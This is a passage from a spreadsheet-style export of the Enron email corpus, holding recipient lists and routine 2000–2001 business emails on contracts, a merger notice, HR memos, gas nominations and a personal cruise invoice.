nia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'mary.gosnell@enron.com', 'connie.sutton@enron.com', "karen.o'day@enron.com", 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'anita.patton@enron.com', 'cyril.price@enron.com', 'melba.lozano@enron.com', 'colleen.sullivan@enron.com', 'elsa.villarreal@enron.com', 'eol.center@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'camille.gerard@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'kimberlee.bennick@enron.com', 'peter.berzins@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'bernice.rodriguez@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'claudia.clark@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'tara.sweitzer@enron.com', 'chris.mallory@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'joshua.meachum@enron.com', 'keith.clark@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.suttle@enron.com', 'fred.boas@enron.com', 'fiona.skinner@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'kristian.lande@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'carlos.rodriguez@enron.com', 'rhonda.denton@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'jacquelyn.farriel@enron.com', 'rousseau.anai@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'matt.motsinger@enron.com', 'carey.metz@enron.com', 'robert.walker@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'bradley.diebner@enron.com', 'susan.flynn@enron.com', 'cary.carrabine@enron.com', 'rebecca.ford@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'sheri.thomas@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'tracy.ngo@enron.com', 'jeremy.morris@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'frank.davis@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'lisa.lees@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'simone.rose@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'dale.neuner@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'james.shirley@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'jennifer.denny@enron.com', 'lesli.campbell@enron.com', 'georgia.blanchard@enron.com', 'carla.hoffman@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'frank.ortiz@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Notice of Merger-El Paso Merchant Energy</t>
  </si>
  <si>
    <t>Effective 12/31/00, El Paso Merchant Energy-Gas, L.P., CP ID 72297 merged _x000D_
with and into El Paso Merchant Energy, L.P., CP ID 53350.  I have received _x000D_
copies of the Secretary of State certificate as well as the Certificate of _x000D_
Merger.  Today, I suspended the old record, so that new business will not _x000D_
attach to it.  Normally, notification would have been sent out on the 15th of _x000D_
the month, but since I have received phone calls, e-mails expressing _x000D_
concern,  and  copies of the documents from various groups (I appreciate _x000D_
it!), we thought it best to send notification now.  It will also appear on _x000D_
the next report._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cheryl x3-3103</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 06:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peterthompson@akllp.com', 'ppiptone@andrews-kurth.com'})</t>
  </si>
  <si>
    <t>Paul/Peter,_x000D_
_x000D_
Me again.  I have a meeting with ABB for Thursday.  Could you make me a list _x000D_
of issues like you did with the GE contract (removing the comments from the _x000D_
text), and blackline the new clean "commentless" version against the original _x000D_
master contract._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: LEGAL CONFERENCE - SHIRT SIZE</t>
  </si>
  <si>
    <t>If these are men's sizes, I'm a small._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 27 May 1999 12:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elena.kapralova@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.campbell@enron.com', 'jay.webb@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Product Descriptions and Legal Issues</t>
  </si>
  <si>
    <t>Jay and Bob,_x000D_
_x000D_
following our phone conversation I am sending you the latest version of the _x000D_
Product Descriptions. I attached Houston product descriptions as well. Could _x000D_
you please review them both and let me know ASAP which format is preferable _x000D_
and any other comments you may have._x000D_
_x000D_
Also, we've been working with lawyers on Enabling agreement that will be _x000D_
signed with counterparties off-line. The current structure is:_x000D_
_x000D_
One page Internet Trading Access Agreement (ITAA) will be signed off line as _x000D_
prerequisite for getting a password._x000D_
Five page long Electronic Trading Agreement (ETA) will be accepted ("clicked _x000D_
through") on the Website by each person authorised by the counterparty._x000D_
_x000D_
I attached here both documents for two jurisdictions - UK and USA. There are _x000D_
two important issues that require your input: _x000D_
_x000D_
1) in the US document lawyers refer to "services". UK lawyers were not sure _x000D_
what it means and replaced it with "access and utilisation of the Website" _x000D_
assuming that what it is. They asked to confirm whether it is correct or _x000D_
anything else we have to include. _x000D_
Mark, could you please advise on this?_x000D_
_x000D_
2) On the Data protection issue UK lawyers wrote the following: _x000D_
_x000D_
"On reflection, it will be more appropriate for relevant data protection _x000D_
wording to be on the Website itself rather than in the ITAA or ETA._x000D_
&gt; This is because the data protection concerns revolve around data subjects _x000D_
i.e. living_x000D_
&gt; individuals, rather than_x000D_
&gt;  corporate entities such as the Counterparty.  Before providing_x000D_
&gt; appropriate wording for_x000D_
&gt;  this, could you please let me know what information will be_x000D_
&gt; collected by you concerning_x000D_
&gt;  living individuals either intentionally or unintentionally.  For_x000D_
&gt; example, when a password is_x000D_
&gt;  entered will you be able to identify a living individual by this or_x000D_
&gt; can you intentionally or_x000D_
&gt;  unintentionally obtain that individual's e-mail address or other_x000D_
&gt; information on them once_x000D_
&gt;  they have entered the Site."_x000D_
_x000D_
Again, your prompt reply is appreciated._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thank you,_x000D_
Elena</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 08:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Out of Office Reminder</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 11/14/2000 04:32 PM -----_x000D_
_x000D_
	Tom Moran_x000D_
	11/14/2000 04:18 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Out of Office Reminder_x000D_
_x000D_
_x000D_
I justed wanted to be certain that you received this : )_x000D_
---------------------- Forwarded by Tom Moran/HOU/ECT on 11/14/2000 04:15 PM _x000D_
---------------------------_x000D_
From: Karen Lambert on 11/14/2000 04:17 PM_x000D_
To: Kim S Theriot/HOU/ECT@ECT, Matthew Allan/LON/ECT@ECT, Amelia _x000D_
Alland/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT, Enron Europe Global Contracts _x000D_
and Facilities, Dianne Seib/CAL/ECT@ECT, Cyndie _x000D_
Balfour-Flanagan/Corp/Enron@ENRON, Martha Stevens/HOU/ECT@ECT, Sarah _x000D_
Smith/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Denae Umbower/Enron _x000D_
Communications@Enron Communications, Molly Lafuze/Enron Communications@ENRON _x000D_
COMMUNICATIONS@ENRON, Molly.Lafuze@enron.net, Alexia Gonzales/HOU/ECT@ECT, _x000D_
Stephen Furter/LON/ECT@ECT, Andrew Wells/LON/ECT@ECT, Michelle _x000D_
Schultz/NA/Enron@ENRON, cbalfou@enron.com, Denae Umbower/Enron _x000D_
Communications@Enron Communications, Laurie Lee/NA/Enron@Enron, Rhonda L _x000D_
Denton/HOU/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT, Stacey _x000D_
Richardson/HOU/ECT@ECT, Chris Wiebe/CAL/ECT@ECT, Peggy Hedstrom/CAL/ECT@ECT, _x000D_
Juana Fayett/Corp/Enron@Enron, Cheryl Dudley/HOU/ECT@ECT, Gina _x000D_
LaVallee/CAL/ECT@ECT, Bridgette Anderson/Corp/Enron@ENRON, James _x000D_
Scully/HOU/ECT@ECT, Lynn E Shivers/HOU/ECT@ECT, Susan Elledge/NA/Enron@Enron, _x000D_
Linda K Loukanis/HOU/ECT@ECT, banders@enron.com, Danny Clark/Enron _x000D_
Communications@Enron Communications, Amy Heffernan/Enron Communications@Enron _x000D_
Communications, Gail Hill/LON/ECT@ECT, Charlie Hoang/HOU/ECT@ECT, Frank L _x000D_
Davis/HOU/ECT@ECT, Camille Gerard/Corp/Enron@ENRON, Noel _x000D_
Petterson/Corp/Enron@Enron, Stephanie Sever/HOU/ECT@ECT, Lisa _x000D_
Lees/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Paul _x000D_
Cherry/GPGFIN/Enron@ENRON, Ted Chavez/GPGFIN/Enron@ENRON, Linda S _x000D_
Bryan@Enron, Samuel Schott/HOU/ECT@ECT, Adnan Patel/Corp/Enron@ENRON, Mary G _x000D_
Gosnell/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Bethany _x000D_
Denson/AA/Corp/Enron@ENRON, Fred Castrow/NA/Enron@ENRON, Corey _x000D_
Hollander/Corp/Enron@Enron, Mark D Thorne/HOU/ECT@ECT, Judy _x000D_
Walters/HOU/ECT@ECT_x000D_
cc: Steve Venturatos/HOU/ECT@ECT, Julissa Marron/Corp/Enron@ENRON, Lola _x000D_
Willis/Corp/Enron@ENRON, Sandra R McNichols/HOU/ECT@ECT _x000D_
Subject: Out of Office Reminder_x000D_
_x000D_
I will be out of the office Wednesday morning November 15, 2000, for a brief _x000D_
appointment.  If you require assistance with an EOL or ClickPaper-related _x000D_
contracts matter during that time, then you may contact Stacey Richardson.  _x000D_
If I am out of the office and you are unable to reach Stacey, then please _x000D_
contact Linda Bryan.  _x000D_
_x000D_
Global Online Trading Contacts_x000D_
     Name   Work Telephone Pager Number_x000D_
For all online-related Global matters: Karen Lambert  (713) 853-0605  (713) _x000D_
707-6571_x000D_
Backup     Stacey Richardson (713) 853-0569  (713) 710-6084    _x000D_
      Linda Bryan   (713) 853-3538  (713) 709-3443_x000D_
_x000D_
     Name   Work Telephone  _x000D_
For Global Counterparty matters only: Samuel Schott  (713) 853-9890  _x000D_
Backup     Adnan Patel  (713) 853-8335  (713) 788-9458  team pager_x000D_
     Mary Gosnell  (713) 853-1727 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:54:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.denne@enron.com', 'j..kean@enron.com'})</t>
  </si>
  <si>
    <t>FW: Employee Memo re: Changes to HR Policy and Employee Programs</t>
  </si>
  <si>
    <t xml:space="preserve">Karen and Steve:  Terrie James and I thought it appropriate to communicate the severance decision separately from vacation and the other benefits and community changes in the e-mail below, which we planned to send out tomorrow.  Due to the time line HR has planned for next week, we planned to send out the severance message Monday.  Can you give us some direction on this (see David's comment)? _x000D_
_x000D_
On another note, what messages will the press release contain?  This came up a meeting Sarah and I had with the HR team today._x000D_
_x000D_
Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Oxley, David  _x000D_
Sent:	Tuesday, November 20, 2001 3:41 PM_x000D_
To:	James, Terrie; Cash, Michelle; Clark, Mary; Johnson, Rick; Joyce, Mary; Barrow, Cynthia; Jones, Robert W.- HR Exec_x000D_
Cc:	Olson, Cindy; Palmer, Lizzette; Sullivan, Kriste_x000D_
Subject:	RE: Employee Memo re: Changes to HR Policy and Employee Programs _x000D_
_x000D_
We need to make sure the vacation component is tied in with severance decision which we haven't yet concluded. We need PR to help with deciding how we package these things._x000D_
 -----Original Message-----_x000D_
From: 	James, Terrie  _x000D_
Sent:	Tuesday, November 20, 2001 1:45 PM_x000D_
To:	Cash, Michelle; Clark, Mary; Johnson, Rick; Oxley, David; Joyce, Mary; Barrow, Cynthia; Jones, Robert W.- HR Exec_x000D_
Cc:	Kalmans, Elyse; Kimberly, Kelly; Olson, Cindy; Palmer, Lizzette; Palmer, Sarah; Tobor, Rachael; Sullivan, Kriste_x000D_
Subject:	Employee Memo re: Changes to HR Policy and Employee Programs _x000D_
_x000D_
_x000D_
The attached memo is to be distributed to all US-based employees this afternoon.  We've opted to include the various changes to HR policies and employee programs in one consolidated memo to reduce the number of negative e-mails employees receive over the next few weeks.  Please review at your earliest convenience and provide changes to me.  If  I do not receive changes from you by 3:30 p.m. today, I will assume you have none._x000D_
_x000D_
Thanks for your prompt reply,_x000D_
Terrie James_x000D_
Ext. 3-7727_x000D_
EB4528_x000D_
terrie.james@enron.com &lt;mailto:terrie.james@enron.com&gt;_x000D_
_x000D_
 &lt;&lt; File: Policy change notice DRAFT.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 00:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Existing Deals</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me the Meta ID.  I don't remember it.  I want to make sure we _x000D_
have covered all of the counterparties.  Thanks._x000D_
_x000D_
DG_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 07/25/2000 _x000D_
07:36 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Gregg Penman @ ENRON                           07/21/2000 04:09 PM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc: Kevin P Radous/Corp/Enron@Enron _x000D_
Subject: Existing Deals_x000D_
_x000D_
Thanks for the list of existing transactions.  Only one question, it looks _x000D_
like the list includes only the different corporate entities of NICOR.  Does _x000D_
that mean that there were no existing transactions with the other Corporate _x000D_
families, i.e. NIPSCO, CILCO, PGL and NS?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg_x000D_
---------------------- Forwarded by Gregg Penman/Corp/Enron on 07/21/2000 _x000D_
04:05 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kevin P Radous                           07/21/2000 11:40 AM_x000D_
	_x000D_
_x000D_
To: gregg.penman@enron.com_x000D_
cc:  _x000D_
Subject: Existing Deals_x000D_
_x000D_
Gregg,_x000D_
_x000D_
Attached is a list (forwards detail by risk type) disclosing all the deals _x000D_
that Darron could come_x000D_
up with given your parameters._x000D_
_x000D_
Glad the risk management group could be of some assistance._x000D_
_x000D_
KR_x000D_
---------------------- Forwarded by Kevin P Radous/Corp/Enron on 07/21/2000 _x000D_
11:38 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Darron C Giron @ ECT                           07/21/2000 10:56 AM_x000D_
	_x000D_
_x000D_
To: Kevin P Radous/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Existing Deals_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lauri.allen@enron.com', 'daren.farmer@enron.com', 'tom.acton@enron.com'})</t>
  </si>
  <si>
    <t>1st rev Apr. 2000 HPL nom</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
---------------------- Forwarded by Susan D Trevino/HOU/ECT on 04/12/2000 _x000D_
10:38 AM ---------------------------_x000D_
_x000D_
_x000D_
Bob Withers &lt;rww@KCSEnergy.com&gt; on 04/12/2000 10:41:40 AM_x000D_
To: "Susan Trevino (E-mail)" &lt;Susan.D.Trevino@enron.com&gt;_x000D_
cc: Stretch Brennan &lt;djb@kcsenergy.com&gt;, Knox Westmoreland _x000D_
&lt;rkw@KCSEnergy.com&gt;, Kevin McLarney &lt;kmm@kcsenergy.com&gt;, "Taylor Vance _x000D_
(E-mail)" &lt;vtaylor2@enron.com&gt; _x000D_
Subject: 1st rev Apr. 2000 HPL nom_x000D_
_x000D_
_x000D_
Here's REVISED April 2000 (effective 4/13/00) setup for JOSEY RANCH (HPL_x000D_
#989658: using 1.071 Btu/Mcf)_x000D_
* Gas deliveries into HPL_x000D_
    9,100 MMBtu/d  for KRI  (decrease of_x000D_
2,000 MMBtu/d)_x000D_
    1,900 MMbtu/d for Texaco  (no net change)_x000D_
  11,000 MMBtu/d into HPL  ("net" decrease of_x000D_
2,000 MMBtu/d)_x000D_
_x000D_
If you need any additional information, KCS' field contact is Stretch_x000D_
Brennan in Victoria:  512-576-1005._x000D_
_x000D_
_x000D_
Bob Withers &lt;*))&gt;&gt;&lt;_x000D_
KCS Energy, 5555 San Felipe, Suite 1200_x000D_
Houston, TX  77056_x000D_
voice mail/page 713-964-9434_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 10:43:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>Crystal:_x000D_
_x000D_
Thanks for following up!  Yes its OK to use the same credit card.  Let me know if you have problems._x000D_
_x000D_
	Thanks,   Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Crystal Schwartz &lt;cschwartz_vitoltvl@yahoo.com&gt;@ENRON [mailto:IMCEANOTES-Crystal+20Schwartz+20+3Ccschwartz+5Fvitoltvl+40yahoo+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, May 25, 2001 12:42 PM_x000D_
To:	Schwieger, Jim_x000D_
Subject:	 _x000D_
_x000D_
Jim,_x000D_
_x000D_
 Hello again. The balance is due on this can I charge to your Mastercard_x000D_
?  Just let me know if we need to change card etc.._x000D_
_x000D_
Thanks,_x000D_
Crystal                                          AGENT CS/CS BOOKING REF_x000D_
ZHJOP5_x000D_
_x000D_
                                          SCHWIEGER/JAMES_x000D_
_x000D_
_x000D_
  ENRON_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
  JAMES SCHWIEGER EXT 37705_x000D_
_x000D_
_x000D_
  DATE:  MAY 25 2001                   PERSONAL_x000D_
_x000D_
_x000D_
_x000D_
MISCELLANEOUS         09AUG COPENHAGEN_x000D_
                      THU   HOLLAND AMERICA_x000D_
_x000D_
_x000D_
                                          CRUISE FARE            2604.00_x000D_
                                         PORT CHARGES             235.89_x000D_
                                    CRUISE PROTECTION             227.85_x000D_
                                     DEPOSIT RECEIVED            -727.85_x000D_
_x000D_
                                        INVOICE TOTAL            2339.89_x000D_
_x000D_
PAYMENT: CA_x000D_
_x000D_
CRUISE LINE - HOLLAND AMERICA_x000D_
CRUISE SHIP - NOORDAM_x000D_
DEPARTURE DATE FROM COPENHAGAN - AUGUST 9, 2001_x000D_
RETURN DATE FROM COPENHAGEN - AUGUST 19, 2001_x000D_
CRUISE INTINERARY -_x000D_
AUG - COPENHAGAN / AUG 10 CRUISING THE BALTIC / AUG 11_x000D_
TALLIN, ESTONIA / AUG 12 ST. PETERSBURG / AUG 13 ST. PETERBURG_x000D_
/ AUG 14 HELSINKI / AUG 15 STOCKHOLM / AUG 16 KALMAR_x000D_
AUG 17 WARNEMUNDE / AUG 18 - 19 COPENHAGEN_x000D_
CRUISE INCLUDES - ACCOMMODATIONS ON BOARD THE SHIP_x000D_
IN CATEGORY B CABIN NUMBER 136 / ALL MEALS ON BOARD THE_x000D_
SHIP / NON-ALCOHOLIC BEVERAGES (EXCLUDING SODAS) / NIGHTLY_x000D_
ENTERTAINMENT / PORT TAXES / CRUISE PROTECTION_x000D_
THE CRUISE PROTECTION WILL ALLOW YOU TO CANCEL THE_x000D_
CRUISE FOR ANY REASON UP TO 24 HOURS PRIOR OT SAILING_x000D_
AND RECEIVE A 90 PERCENT OF THE CRUISE FARE IN A CREDIT._x000D_
HIS CREDIT CAN BE APPLIED TOWARDS ANOTHER CRUISE WITH HOLLAND_x000D_
AMERICA (VOID DATE WILL BE ON THE CERTIFICATE)._x000D_
IF YOU CANCEL FOR A REASON NOT COVERED BY THE INSURANCE_x000D_
THEN YOUR FUNDS WILL BE REFUNDED TO YOU._x000D_
****VALID PASSPORT IS NEEDED FOR TRAVEL***_x000D_
VISAS ARE NEEDED IN SOME AREAS PLEASE CALL VIP SERVICES_x000D_
FOR ASSITANCE AT 800-856-8472._x000D_
*******************************************_x000D_
I HAVE REVIEWED THIS INVOICE AND ANY ATTACHED ITEMS._x000D_
ALL INFORMATION REVIEWED IS CORRECT. I AM AWARE THAT THE_x000D_
DEPOSIT OF 727.85 HAS BEEN CHARGED TO MY MASTER CARD ON FILE._x000D_
**_x000D_
**X......................................_x000D_
**DATE..................................._x000D_
**PLEASE FAX A SIGNED COPY TO 713-759-9006_x000D_
**********THANK YOU CRYSTAL******_x000D_
                  THANK YOU FOR CALLING VITOL TRAVEL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=====_x000D_
Vitol Travel Services_x000D_
1100 Louisiana Suite 3230_x000D_
Houston, Texas 77002_x000D_
Phone - 713-759-1444_x000D_
Fax - 713-759-9006_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - buy the things you want at great prices_x000D_
http://auctions.yahoo.com/</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 02:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pat.clynes@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'howard.camp@enron.com', 'mary.smith@enron.com', 'rhonda.robinson@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Re: Coastal Oil &amp; Gas USA, L.P. Gas Gathering Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">   _x000D_
	_x000D_
	_x000D_
	From:  Jackie Morgan @ ECT                           04/13/2000 04:38 PM_x000D_
	_x000D_
_x000D_
To: Pat Clynes/Corp/Enron@ENRON, Stella L Morris/HOU/ECT@ECT_x000D_
cc: Clem Cernosek/HOU/ECT@ECT, Irene Flynn/HOU/ECT@ECT, Cheryl _x000D_
Dudley/HOU/ECT@ECT _x000D_
_x000D_
Subject: Coastal Oil &amp; Gas USA, L.P. Gas Gathering Agreement_x000D_
_x000D_
The above referenced contract has been set up in Global as a point specific, _x000D_
intrastate transportation agreement. _x000D_
The contract number is 98037831.  The effective date is April 1, 2000.  The _x000D_
Transaction Agreement is noted in the Processing_x000D_
Agreement under 96016936._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Jackie_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 06:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: QBR East Midstream</t>
  </si>
  <si>
    <t xml:space="preserve">Kay, why are we waiting to the end of August!!_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/10/2000 _x000D_
01:43 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kimberly Hillis                           07/10/2000 12:44 PM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: QBR East Midstream  _x000D_
_x000D_
Kay,_x000D_
_x000D_
John is planning on vacation the last week in August.  All other dates are _x000D_
good._x000D_
_x000D_
k_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  David W Delainey                           07/10/2000 12:38 PM_x000D_
	_x000D_
_x000D_
Sent by: Kay Chapman_x000D_
To: Janet R Dietrich/HOU/ECT@ECT, Jeffery Ader/HOU/ECT@ECT, Ozzie _x000D_
Pagan/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, Laura Luce/HOU/ECT@ECT, W David _x000D_
Duran/HOU/ECT@ECT, Gil Muhl/Corp/Enron@ENRON, Bruce Sukaly/Corp/Enron@Enron, _x000D_
Raymond Bowen/HOU/ECT@ECT, Billy Lemmons/Corp/Enron@ENRON, Don _x000D_
Miller/HOU/ECT@ECT, Carl Tricoli/Corp/Enron@Enron, John J _x000D_
Lavorato/Corp/Enron@Enron, Mark Frevert/NA/Enron@Enron_x000D_
cc: Christy Chapman/HOU/ECT@ECT, Claudette Harvey/HOU/ECT@ect, Shelby _x000D_
Malkemes/Corp/Enron@ENRON, Lynn Pikofsky/Corp/Enron@ENRON, Tina _x000D_
Rode/HOU/ECT@ECT, Marsha Schiller/HOU/ECT@ECT, Maxine E _x000D_
Levingston/Corp/Enron@Enron, Deana Fortine/Corp/Enron@ENRON, Kimberly _x000D_
Hillis/HOU/ECT@ect, Nicki Daw/NA/Enron@Enron, Jennifer Burns/HOU/ECT@ECT _x000D_
Subject: QBR East Midstream_x000D_
_x000D_
Dave and Mark  would like to have a three (3) hour meeting regarding QBR and _x000D_
they have the following dates available.  Could you please let me know your _x000D_
availability  for these dates ?_x000D_
_x000D_
_x000D_
  August   15 -  Tuesday_x000D_
  August    16 -  Wednesday_x000D_
  August    17 -  Thursday_x000D_
  August    18 -   Friday_x000D_
_x000D_
  August     21 - Monday_x000D_
  August     22 - Tuesday_x000D_
  August     23 - Wednesday_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Contract update</t>
  </si>
  <si>
    <t xml:space="preserve">Sheila,_x000D_
_x000D_
Some minor differences between the draft and the final executed version._x000D_
I have forgotten to bring the draft today, I shall send  a copy to you _x000D_
tomorrow._x000D_
There were some hand-written changes made by Greg ijn the draft that were not _x000D_
transferred to_x000D_
the final version._x000D_
_x000D_
Vince_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 07:29:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: House</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Trav's new house -- I love it. _x000D_
  _x000D_
 - House#2.jpg </t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 05:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Amendment to Sher Bond bill</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;X25946.DOC&gt;&gt;_x000D_
_x000D_
Here is the very short amendment for the Sher Bond Bill.  Mike Day_x000D_
_x000D_
 - X25946.DOC</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 09:50:00 -0700 (PDT)</t>
  </si>
  <si>
